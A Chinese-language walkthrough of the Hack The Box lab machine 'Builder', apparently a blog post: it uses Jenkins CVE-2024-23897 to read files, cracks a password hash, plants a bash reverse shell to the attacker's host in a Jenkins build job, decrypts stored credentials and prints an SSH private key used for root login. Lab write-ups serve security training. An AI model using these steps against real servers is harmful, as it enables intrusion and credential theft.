HTB-Builder

信息收集

TCP开放端口扫描

Nmap scan report for 10.10.11.10

Host is up (8.0s latency).

Not shown: 61658 filtered tcp ports (no-response), 3875 closed tcp ports (reset)

PORT     STATE SERVICE

22/tcp   open  ssh

8080/tcp open  http-proxy

探测tcp开放端口服务信息

# Nmap 7.93 scan initiated Fri Mar 15 13:30:22 2024 as: nmap -v -sC -sT -sV -O -p22,8080, -oA open_port_service -oA open_port_service 10.10.11.10

Nmap scan report for 10.10.11.10

Host is up (0.41s latency).

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|_  256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)

8080/tcp open  http    Jetty 10.0.18

| http-methods:

|_  Supported Methods: GET HEAD POST OPTIONS

| http-robots.txt: 1 disallowed entry

|_/

|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1

|_http-title: Dashboard [Jenkins]

| http-open-proxy: Potentially OPEN proxy.

|_Methods supported:CONNECTION

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)

No exact OS matches for host (test conditions non-ideal).

Uptime guess: 13.362 days (since Sat Mar  2 03:51:07 2024)

Network Distance: 2 hops

TCP Sequence Prediction: Difficulty=256 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Fri Mar 15 13:32:33 2024 -- 1 IP address (1 host up) scanned in 130.59 second

                                                                                                  

Getshell

8080端口                                                                                                

浏览器输入靶机IP后,Jenkins页面,且右下角有明确的版本信息。

浏览器搜索jenkins 2.441 是否存在历史漏洞,发现CVE-2024-23897,然后根据搜索出的文章:

https://github.com/godylockz/CVE-2024-23897

jenkins credentials笔记 | 独奏の小屋

获取py脚本,尝试获取文章中提到的敏感文件,

        /var/jenkins_home/users/users.xml

        /var/jenkins_home/users/jennifer_12108429903186576833/config.xml

获取到一个密码hash

     <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>

取出加密字符串并尝试使用john进行破解:

echo '$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a' > hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt

得到明文密码princess,尝试登录jenkins,成功!

然后开始搜索jenkins的反弹shell方法:

https://github.com/Brzozova/reverse-shell-via-Jenkins

  1. Go to New Item -> Freestyle job -> Execute Windows batch command.

加入反弹shell命令

bash -c "/bin/bash -i >& /dev/tcp/10.10.16.38/9001 0>&1"

点击保存,kali监听本地端口

rlwrap nc -lvnp 9001

注:rlwrap 是 Linux 系统中的一个命令行工具,它的主要作用是为不支持 readline 功能的程序提供 readline 支持。Readline 是一个 GNU 项目,它提供了编辑命令行、保存命令历史记录以及自动完成等功能。

当你在终端中使用某些文本编辑器或者交互式工具时,readline 可以提供非常方便的编辑和导航功能,比如使用方向键移动光标、使用 Ctrl+R 进行历史命令搜索等。然而,并非所有的命令行程序都内置了 readline 支持。

rlwrap 可以在不支持 readline 的程序前作为一个包装器(wrapper),使得这些程序能够借用 readline 的功能。这意味着,通过 rlwrap,你可以在更多的命令行程序中享受到 readline 提供的便捷性。

使用 rlwrap 的一个典型例子是与 nc(netcat)一起使用,因为 nc 默认不支持 readline然后点击Build Now。(浏览器搜索)

然后点击Build Now:

        which script

        /usr/bin/script -qc /bin/bash /dev/null

kali收到反弹shell

 尝试使用python提升交互性并未成功,但好在有script

        which script

        /usr/bin/script -qc /bin/bash /dev/null

           后面枚举信息过程中发现很多基础命令都没有且存在/.dockerenv文件,由此断定在docker环境中。            

提权

根据文章:

        https://hasegawaazusa.github.io/jenkins-credentials-note.html

        将利用文件下载下来传到靶机上,

./jenkins-credentials-decryptor \
  -m $JENKINS_HOME/secrets/master.key \
  -s $JENKINS_HOME/secrets/hudson.util.Secret \
  -c $JENKINS_HOME/credentials.xml \
  -o json

将解密得到的字符复制下来:

-----BEGIN OPENSSH PRIVATE KEY-----\n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\n-----END OPENSSH PRIVATE KEY-----

保存到id_rsa文件中,然后将其改为正确格式

sed 's/\\n/\r\n/g' id_rsa -i

id_rsa文件权限要为600,否则会导致连接失败。

chmod 600 id_rsa

改变文件类型为unix格式

dos2unix id_rsa

尝试连接

ssh root@10.10.11.10 -i id_rsa,成功!

  • 15
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值